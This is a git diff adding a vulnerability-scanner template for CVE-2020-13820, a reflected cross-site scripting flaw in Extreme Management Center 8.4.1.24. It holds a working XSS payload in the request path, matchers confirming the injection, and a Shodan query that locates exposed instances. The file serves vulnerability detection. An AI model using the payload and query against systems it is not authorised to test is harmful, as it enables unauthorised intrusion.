diff --git a/cves/2020/CVE-2020-13820.yaml b/cves/2020/CVE-2020-13820.yaml new file mode 100644 index 0000000000..afa8fa93f8 --- /dev/null +++ b/cves/2020/CVE-2020-13820.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-13820 + +info: + name: Extreme Management Center 8.4.1.24 - Cross Site Scripting + author: tess + severity: medium + description: | + Extreme Management Center 8.4.1.24 allows unauthenticated reflected XSS via a parameter in a GET request. + reference: + - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219 + - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13820 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-13820 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: title:"Extreme Management Center" + tags: cve,cve2020,xss,extremenetworks + +requests: + - method: GET + path: + - "{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "autofocus onfocus='alert(document.domain)" + - "Extreme Management Center" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200